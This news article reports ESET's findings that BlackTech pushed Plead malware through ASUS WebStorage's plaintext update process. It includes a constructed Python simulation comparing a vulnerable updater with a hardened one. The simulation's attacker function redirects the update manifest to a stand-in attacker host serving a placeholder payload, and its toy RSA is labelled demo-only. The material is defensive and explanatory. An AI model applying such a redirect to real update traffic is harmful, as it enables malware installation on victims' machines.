Posted on May 17, at 9:59 AM

Security firm ESET has released findings showing that hackers have been using ASUS' WebStorage cloud service to deliver a particular piece of malware, known as Plead, to unsuspecting victims. ESET's researchers say that the hacking group known as BlackTech has been using a combination of security weaknesses in ASUS' platform to pull off this hack.

Attacks combine various hacks to infect computers

The BlackTech Group, which Trend Micro has identified as a group that specifically targets both governmental and private organizations across Asia, is using a complicated series of steps that ESET has not yet been able to fully understand. The group came into the limelight last year when it used code-signing certificates stolen from D-Link to make its malware appear cryptographically trustworthy. Before that incident, the group relied on spear-phishing and on compromised routers, which served as the command-and-control (C&C) servers for the malware it distributed.

Initially, the security company's researchers thought the malware was part of yet another supply-chain attack, since ASUS had suffered a similar attack not long ago. However, the supply-chain theory was quickly disproved, which suggests that ASUS had managed to close that particular loophole.

Even so, this latest hack is a testament to how poor ASUS' security really is: the hackers were able to hijack data sent from its cloud service because that traffic was unencrypted. Many in the security industry think that, given the history of breaches ASUS has had, the company would have made sure that all of its services were as secure as possible.

The malware arrived on victims' computers via a file called AsusWSPanel.exe, which ran as a normal process on users' machines and was even digitally signed by ASUS WebStorage. This is what led the researchers to suspect another supply-chain attack, but for three notable observations.

First, the service delivered clean binaries in addition to Plead executables. Second, there was no evidence of the ASUS servers being used as control servers for malicious code. Third, the hackers used standalone files rather than packaging the malware inside legitimate ASUS software. Taken together, this showed the researchers that something else was at play.

MitM due to unencrypted connections

While examining the most likely scenarios by which the attackers could infect victims, the researchers noticed that the ASUS WebStorage software was extremely vulnerable to man-in-the-middle attacks because its updates were requested over an unencrypted HTTP connection. Furthermore, the ASUS software did not validate the authenticity of the code it downloaded at all.

This led the researchers to conclude that BlackTech was intercepting the update process of ASUS WebStorage and pushing Plead to the target computer instead of the expected update. One more interesting tidbit the researchers uncovered was that the routers used by the affected organizations were, for all intents and purposes, the same. ESET declined to name the company responsible for these routers, as it is still investigating this aspect of the hack. The researchers think that part of the attack may have been carried out by planting fake DNS settings in the routers themselves, or possibly by something as involved as tampering with the routers' iptables rules.
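To make the weakness concrete, here is an added example; it is constructed for this page and is not ESET's analysis or ASUS' code. The JSON manifest format, the `.invalid` hostnames, the payload bytes and the small RSA helper are all assumptions, and that helper is only a stand-in for a real signature scheme such as RSA-PSS or Ed25519. The script simulates the update exchange between a client and its update server with an on-path attacker in the position the hijacked routers gave BlackTech: the vulnerable client asks for its manifest over plaintext HTTP and executes whatever the returned link serves, while the hardened client pins an HTTPS URL, verifies the vendor's signature on the manifest and checks the binary's digest before running it. It goes one step beyond the article by also modelling two stronger attackers the router alone does not give you.

```python
import hashlib
import json
import random

# Toy RSA over SHA-256, a stand-in for a real scheme (RSA-PSS, Ed25519); demo only.
def _is_probable_prime(n, rounds=32):
    if any(n % p == 0 for p in (2, 3, 5, 7, 11, 13)):
        return n in (2, 3, 5, 7, 11, 13)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):  # Miller-Rabin witnesses
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits):
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand

def keygen(bits=512):
    """Returns ((e, n), (d, n)); n > 2**256, so a SHA-256 digest fits under it."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (e, p * q), (pow(e, -1, phi), p * q)

def _h(data):
    return int.from_bytes(hashlib.sha256(data).digest(), "big")
def sign(priv, data):
    return pow(_h(data), priv[0], priv[1])
def verify(pub, data, sig):
    return isinstance(sig, int) and pow(sig, pub[0], pub[1]) == _h(data)

VENDOR_PUB, _VENDOR_PRIV = keygen()  # the public half ships inside the client
# Constructed payloads and hostnames (assumptions, not the real service).
GENUINE_UPDATE = b"MZ\x90\x00 genuine AsusWSPanel update (constructed bytes)"
PLEAD_PAYLOAD = b"MZ\x90\x00 Plead loader (constructed stand-in bytes)"
CHECK_HTTP = "http://update.vendor.invalid/check"    # what the weak client asks
CHECK_HTTPS = "https://update.vendor.invalid/check"  # pinned in the hardened one
DOWNLOAD_HTTPS = "https://update.vendor.invalid/AsusWSPanel.exe"

def _canonical(m):  # the bytes the vendor signs: version, link and binary digest
    return f"{m['version']}|{m['url']}|{m['sha256']}".encode()

def honest_server(url):
    """Vendor server: signed JSON manifest on /check, the binary on any other path."""
    if url.endswith("/check"):
        m = {"version": "2.0", "url": DOWNLOAD_HTTPS,
             "sha256": hashlib.sha256(GENUINE_UPDATE).hexdigest()}
        m["signature"] = sign(_VENDOR_PRIV, _canonical(m))
        return json.dumps(m).encode()
    return GENUINE_UPDATE

def router_mitm(url):
    """On-path attacker (hijacked router DNS or iptables): rewrites plaintext HTTP
    only; returns None for HTTPS, whose certificate it cannot forge."""
    if not url.startswith("http://"):
        return None
    if url.endswith("/check"):
        m = {"version": "9.9", "url": "http://cdn.attacker.invalid/AsusWSPanel.exe",
             "sha256": hashlib.sha256(PLEAD_PAYLOAD).hexdigest(), "signature": 0}
        return json.dumps(m).encode()
    return PLEAD_PAYLOAD

def full_mitm(url):  # can also break the TLS hop, but still lacks the signing key
    return router_mitm(url.replace("https://", "http://", 1))
def cdn_takeover(url):  # controls only the download host, over any scheme
    return PLEAD_PAYLOAD if url.endswith("/AsusWSPanel.exe") else None
def fetch(url, attacker=None):  # simulated network: attacker answers when it can
    hijacked = attacker(url) if attacker else None
    return honest_server(url) if hijacked is None else hijacked

def vulnerable_client(attacker=None):
    """Plaintext check, no signature or digest check: runs whatever the link serves."""
    m = json.loads(fetch(CHECK_HTTP, attacker))
    return fetch(m["url"], attacker)  # the bytes this client would execute

def hardened_client(attacker=None):
    """HTTPS-only manifest URL plus signature and binary digest checks."""
    m = json.loads(fetch(CHECK_HTTPS, attacker))
    if not verify(VENDOR_PUB, _canonical(m), m.get("signature")):
        return ("rejected: bad manifest signature", None)
    blob = fetch(m["url"], attacker)
    if hashlib.sha256(blob).hexdigest() != m["sha256"]:
        return ("rejected: binary digest mismatch", None)
    return ("ok", blob)
```

Run `vulnerable_client(router_mitm)` and you get the Plead bytes back: a router that only rewrites plaintext is enough against a client that never verifies anything. `hardened_client(router_mitm)` still installs the genuine update, because the attacker cannot answer for the HTTPS check URL. The two extra attackers show why transport security alone is not the whole fix: `full_mitm` (an attacker who also defeats TLS on the victim) is stopped by the manifest signature, and `cdn_takeover` (a compromised download host serving a different binary under a genuine manifest) is stopped by the digest check.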

It was the discovery of the link between the routers that led the ESET researchers to rule out a supply-chain attack entirely and focus on the current working theory of a MitM attack. So far, the company has traced the attack to 20 computers that received the Plead malware. That is only the count among ESET's own clients, and the researchers believe the real number is likely much higher.

This is the second time ASUS has been caught out in as many months, with the computer maker's reputation taking more and more hits.

ASUS Embarrassed Again As Hackers Use Their Cloud Service To Infect Machines

Author: Ali Raza
Publisher: Koddos